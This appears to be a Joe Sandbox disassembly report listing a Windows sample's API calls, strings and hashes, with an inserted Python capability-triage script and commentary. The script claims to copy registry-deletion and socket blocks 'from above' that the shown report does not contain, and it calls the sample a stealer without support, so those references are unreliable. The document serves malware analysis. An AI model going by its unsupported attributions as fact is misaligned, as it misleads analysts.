                                                    • Instruction Fuzzy Hash: 9321C475200508BF9F249FA8DC88CAB77EEEB09760B108225FD54CB2A1DA71DD458B64
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: 7ca22a830a4215522b1ce158b5eebc09073768b83423870ecb53cd85ef5eb608
                                                    • Instruction ID: 8b0dfd1664a3e5bf54f09cf208c5fea66cafce775ae43f4cdafd31414ef39e72
                                                    • Opcode Fuzzy Hash: 7ca22a830a4215522b1ce158b5eebc09073768b83423870ecb53cd85ef5eb608
                                                    • Instruction Fuzzy Hash: CC217972204665A6D330A730ED22FE7739FEF21301F144039FC8687281EB51AD8AD299
                                                    APIs
                                                      • Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
                                                      • Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
                                                      • Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006878A1
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006878AE
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006878B9
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006878C8
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006878D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: a5c24e37f05b05b322eb23c1f94e30bd2e2dc496a8fe9e2ab860b2ef12e57498
                                                    • Instruction ID: e6f412c0796d3cfe28fff288663940fdf08d6f109dba5504a4ff6f787448b177
                                                    • Opcode Fuzzy Hash: a5c24e37f05b05b322eb23c1f94e30bd2e2dc496a8fe9e2ab860b2ef12e57498
                                                    • Instruction Fuzzy Hash: B21190B2150219BFEF159F60CC85EE77F6EEF08758F115224BA04A6090CB72AC21DBA4
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00624292,?), ref: 006241E3
                                                    • GetProcAddress.KERNEL32(00000000), ref: 006241EA
                                                    • EncodePointer.KERNEL32(00000000), ref: 006241F6
                                                    • DecodePointer.KERNEL32(00000001,00624292,?), ref: 00624213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 3489934621-340411864
                                                    • Opcode ID: 7e05ed706453a5a14a932c9378e99eeb1567c150d77c172afd4e92504022cccf
                                                    • Instruction ID: d599f98c4e483111ee0846dae824715235dd760f16e33a37826437a5ba44e5d9
                                                    • Opcode Fuzzy Hash: 7e05ed706453a5a14a932c9378e99eeb1567c150d77c172afd4e92504022cccf
                                                    • Instruction Fuzzy Hash: A0E01AB0691301BFEF219BB1EC2DF743AABBB20B02F156524F551E59A0DFB540959F40
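The per-function "APIs" listings above are the raw material for capability triage: the RegEnumKeyExW/RegDeleteKeyW block, the socket/ioctlsocket/connect block and the LoadLibraryExW/GetProcAddress block each describe one behaviour once the arguments are decoded. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample, that parses listing lines in the report's own "• Name.MODULE(args), ref: ADDR" form and tags each function. The sample input is copied from the three blocks above; the constants FIONBIO (8004667E) and LOAD_LIBRARY_SEARCH_SYSTEM32 (00000800) are the Windows SDK values. The recursion check is an inference: the "Part of subcall function 0068122D" entries have ref addresses inside the calling function's own ref range, which is only possible if the subcall is the function itself.

```python
"""Capability triage over Joe Sandbox per-function API listings (added example)."""
import re

# Constructed sample input: API lines copied from the report's function blocks.
SAMPLE_REPORT = """\
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0068125C
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00681286
• FreeLibrary.KERNEL32(00000000), ref: 0068133D
  • Part of subcall function 0068122D: RegCloseKey.ADVAPI32(?), ref: 006812A3
  • Part of subcall function 0068122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00681318
• RegDeleteKeyW.ADVAPI32(?,?), ref: 006812E0
APIs
  • Part of subcall function 006780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006780CB
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006764D9
• WSAGetLastError.WSOCK32(00000000), ref: 006764E8
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00676521
• connect.WSOCK32(00000000,?,00000010), ref: 0067652A
• WSAGetLastError.WSOCK32 ref: 00676534
• closesocket.WSOCK32(00000000), ref: 0067655D
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00624292,?), ref: 006241E3
• GetProcAddress.KERNEL32(00000000), ref: 006241EA
• EncodePointer.KERNEL32(00000000), ref: 006241F6
• DecodePointer.KERNEL32(00000001,00624292,?), ref: 00624213
"""

# One listing entry; the argument list is optional (e.g. "WSAGetLastError.WSOCK32 ref: ...").
CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

FIONBIO = 0x8004667E                   # ioctlsocket: switch socket to non-blocking mode
LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800   # LoadLibraryEx: resolve the DLL from System32 only
AF_INET, SOCK_STREAM = 2, 1


def parse_functions(text):
    """Split the listing on 'APIs' headers. Each function becomes a list of
    dicts: api, mod, args (list of str), ref (int), sub (int or None)."""
    functions = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            functions.append([])
            continue
        m = CALL_RE.search(stripped)
        if not m or not functions:
            continue
        args = m.group("args")
        functions[-1].append({
            "api": m.group("api"),
            "mod": m.group("mod").upper(),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "sub": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return functions


def _hex_arg(call, index):
    """Argument `index` as int, or None when it is unknown ('?') or absent."""
    try:
        return int(call["args"][index], 16)
    except (IndexError, ValueError):
        return None


def classify(calls):
    """Return capability tags for one function's call set."""
    apis = {c["api"] for c in calls}
    tags = []
    if {"socket", "connect"} <= apis:
        tcp = any(c["api"] == "socket" and _hex_arg(c, 0) == AF_INET
                  and _hex_arg(c, 1) == SOCK_STREAM for c in calls)
        nonblocking = any(c["api"] == "ioctlsocket" and _hex_arg(c, 1) == FIONBIO
                          for c in calls)
        tags.append("nonblocking_tcp_connect" if tcp and nonblocking else "tcp_connect")
    if {"RegEnumKeyExW", "RegDeleteKeyW"} <= apis:
        # A subcall entry whose ref lies inside this function's own ref range
        # means the enumerate-and-delete loop calls back into itself.
        own = [c["ref"] for c in calls if c["sub"] is None]
        recursive = bool(own) and any(
            c["api"] == "RegEnumKeyExW" and c["sub"] is not None
            and min(own) <= c["ref"] <= max(own) for c in calls)
        tags.append("recursive_registry_key_delete" if recursive else "registry_key_delete")
    if "GetProcAddress" in apis:
        for c in calls:
            if c["api"].startswith("LoadLibrary") and c["args"]:
                tags.append("dynamic_import:" + c["args"][0].lower())
                if c["api"].startswith("LoadLibraryEx") and \
                        (_hex_arg(c, 2) or 0) & LOAD_LIBRARY_SEARCH_SYSTEM32:
                    tags.append("load_library_search_system32")
    return tags


def triage(text):
    """Map each function's first ref address (hex) to its capability tags."""
    return {f"{f[0]['ref']:08X}": classify(f) for f in parse_functions(text) if f}


if __name__ == "__main__":
    for first_ref, tags in triage(SAMPLE_REPORT).items():
        print(first_ref, ", ".join(tags) or "-")
```

The combase.dll block resolves RoInitialize with the System32-only search flag and then EncodePointer/DecodePointer on the result, which is the pattern of a runtime library delay-loading a Windows 8+ API rather than of the payload; the tag still records that the function resolves imports at run time. The registry tag is the one worth following up in a stealer report, since an enumerate-and-delete loop over a key subtree is what a cleanup or persistence-reset routine looks like.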
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006241B8), ref: 006242B8
                                                    • GetProcAddress.KERNEL32(00000000), ref: 006242BF
                                                    • EncodePointer.KERNEL32(00000000), ref: 006242CA
                                                    • DecodePointer.KERNEL32(006241B8), ref: 006242E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: ac0f19f43787379e074130e7828b8be381768330a8e836083ea518020a2299b0
                                                    • Instruction ID: cbc9d32edc730fc343c067c9721f5382f85c6f65d498ac35607bd0e8e1b042c8
                                                    • Opcode Fuzzy Hash: ac0f19f43787379e074130e7828b8be381768330a8e836083ea518020a2299b0
                                                    • Instruction Fuzzy Hash: D8E01278682201FFEB00DB61FC6CF613AABBB20B42F142124F041E19A0CFB446449B84
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: 66ad4186d3204babbd3c42a1bb89c22eaa972b443cfecd9d02f8356ef0ff4d95
                                                    • Instruction ID: 6d5d0dcd42caea2f16aa29d720fcae19dc27deee12637f23f745c24fca90d6af
                                                    • Opcode Fuzzy Hash: 66ad4186d3204babbd3c42a1bb89c22eaa972b443cfecd9d02f8356ef0ff4d95
                                                    • Instruction Fuzzy Hash: E9619B3054469AABCF15EF64D882EFF37A6AF05308F04461DF85A5B2D2DB30AC41CBA4
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 006810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00680038,?,?), ref: 006810BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680548
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00680588
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006805AB
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006805D4
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00680617
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00680624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: ef7ab207638ac6e76624ffcc149979669cbf0f0b6d03702baf5a564d575608f5
                                                    • Instruction ID: b69b3ea1be959f40a646fc010fd68978a3e010973f080868d08626057a759d84
                                                    • Opcode Fuzzy Hash: ef7ab207638ac6e76624ffcc149979669cbf0f0b6d03702baf5a564d575608f5
                                                    • Instruction Fuzzy Hash: 83516A31208240AFDB54EF14C885E6BBBEAFF89314F044A1DF545872A2DB31E949CB56
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 00685A82
                                                    • GetMenuItemCount.USER32(00000000), ref: 00685AB9
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00685AE1
                                                    • GetMenuItemID.USER32(?,?), ref: 00685B50
                                                    • GetSubMenu.USER32(?,?), ref: 00685B5E
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00685BAF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 8c80c4f66f3c214af8c8547817489b52b7ad0daca3c90d416055446985b31a23
                                                    • Instruction ID: 1f0f90e97a680eae1b0a20d02d43d5d28cffaa5b74532a87db5afb2b86c64168
                                                    • Opcode Fuzzy Hash: 8c80c4f66f3c214af8c8547817489b52b7ad0daca3c90d416055446985b31a23
                                                    • Instruction Fuzzy Hash: 56518F31A00625EFCF15EFA4C895AEEB7B6EF58310F104569E812BB351CB70AE41CB95
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0065F3F7
                                                    • VariantClear.OLEAUT32(00000013), ref: 0065F469
                                                    • VariantClear.OLEAUT32(00000000), ref: 0065F4C4
                                                    • _memmove.LIBCMT ref: 0065F4EE
                                                    • VariantClear.OLEAUT32(?), ref: 0065F53B
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0065F569
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: 6eb77c058b3cad8c34a7c9f9709f5f8530f42dadb6f894d780cf5b07d8a7ade4
                                                    • Instruction ID: e82363c52f2c0173b02a23bbe82552c34ae4db1678ba87f6f1ee61087c6fe645
                                                    • Opcode Fuzzy Hash: 6eb77c058b3cad8c34a7c9f9709f5f8530f42dadb6f894d780cf5b07d8a7ade4
                                                    • Instruction Fuzzy Hash: C3515AB5A00209AFCB10CF58D884AAAB7F9FF4C354F15856AED59DB341E730E915CBA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662747
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662792
                                                    • IsMenu.USER32(00000000), ref: 006627B2
                                                    • CreatePopupMenu.USER32 ref: 006627E6
                                                    • GetMenuItemCount.USER32(000000FF), ref: 00662844
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00662875
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: f66ea1407e439be467b96a068f5cde078f9229ccaec8603921459b9ded2a8678
                                                    • Instruction ID: 47bb088c112711cc47c554ce4982757610ba8f91a1d96d7b901dfba731e0607d
                                                    • Opcode Fuzzy Hash: f66ea1407e439be467b96a068f5cde078f9229ccaec8603921459b9ded2a8678
                                                    • Instruction Fuzzy Hash: F3518E70A01B07EBDF24CF69DCA8AEEBBF6AF44314F10426DE8119B291D7709949CB51
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0060179A
                                                    • GetWindowRect.USER32(?,?), ref: 006017FE
                                                    • ScreenToClient.USER32(?,?), ref: 0060181B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0060182C
                                                    • EndPaint.USER32(?,?), ref: 00601876
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: 0e64298c76f6a6258e4472e608d98c054ab7650792cdf836abd5fe03f2292c43
                                                    • Instruction ID: 68e48d551466f1c1f50c496909524be5823119cbdf7dbe44647ff311e61af89a
                                                    • Opcode Fuzzy Hash: 0e64298c76f6a6258e4472e608d98c054ab7650792cdf836abd5fe03f2292c43
                                                    • Instruction Fuzzy Hash: 21418B70604301AFD710DF24CC84FBB7BEAEB4A724F144629FAA5CA2E1C7319945DB61
                                                    APIs
                                                    • ShowWindow.USER32(006C67B0,00000000,01315678,?,?,006C67B0,?,0068B862,?,?), ref: 0068B9CC
                                                    • EnableWindow.USER32(00000000,00000000), ref: 0068B9F0
                                                    • ShowWindow.USER32(006C67B0,00000000,01315678,?,?,006C67B0,?,0068B862,?,?), ref: 0068BA50
                                                    • ShowWindow.USER32(00000000,00000004,?,0068B862,?,?), ref: 0068BA62
                                                    • EnableWindow.USER32(00000000,00000001), ref: 0068BA86
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0068BAA9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 77bb4a715b0ca8b315ae7a883a0b2f78e46918447bdee76da76db23c798009f0
                                                    • Instruction ID: fb5cd180975ddc699420e84787b3eb04b951f1abc4e7aa08302bae92adbdaf42
                                                    • Opcode Fuzzy Hash: 77bb4a715b0ca8b315ae7a883a0b2f78e46918447bdee76da76db23c798009f0
                                                    • Instruction Fuzzy Hash: FA414C30640241AFDB26DF24C499BD57BE2FB06310F1853A9FA588F3A2C771A846CB51
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00675134,?,?,00000000,00000001), ref: 006773BF
                                                      • Part of subcall function 00673C94: GetWindowRect.USER32(?,?), ref: 00673CA7
                                                    • GetDesktopWindow.USER32 ref: 006773E9
                                                    • GetWindowRect.USER32(00000000), ref: 006773F0
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00677422
                                                      • Part of subcall function 006654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0066555E
                                                    • GetCursorPos.USER32(?), ref: 0067744E
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006774AC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: e01acb2b5a3156fe5b2b8a085574bf67488fb601dfc40366dba211808a475564
                                                    • Instruction ID: 4f1082fa7dda4450a557a36248935bd91cc48d4914b9c9670bb61a1fa23ef1d6
                                                    • Opcode Fuzzy Hash: e01acb2b5a3156fe5b2b8a085574bf67488fb601dfc40366dba211808a475564
                                                    • Instruction Fuzzy Hash: 2B31E472508305ABD720DF14D849F9BBBEAFF88314F004A19F589A7291DB30E908CB92
                                                    APIs
                                                      • Part of subcall function 006585F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00658608
                                                      • Part of subcall function 006585F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00658612
                                                      • Part of subcall function 006585F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00658621
                                                      • Part of subcall function 006585F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00658628
                                                      • Part of subcall function 006585F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0065863E
                                                    • GetLengthSid.ADVAPI32(?,00000000,00658977), ref: 00658DAC
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00658DB8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00658DBF
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00658DD8
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00658977), ref: 00658DEC
                                                    • HeapFree.KERNEL32(00000000), ref: 00658DF3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: 4daa461a8da49a331d87b414b3575986a8afde3c0ecc3735ce2e9be7d1e74f7b
                                                    • Instruction ID: 11e9b0ce2707bca7f2a0eeba89d1d2850684386b299ab29efd281ce865794f91
                                                    • Opcode Fuzzy Hash: 4daa461a8da49a331d87b414b3575986a8afde3c0ecc3735ce2e9be7d1e74f7b
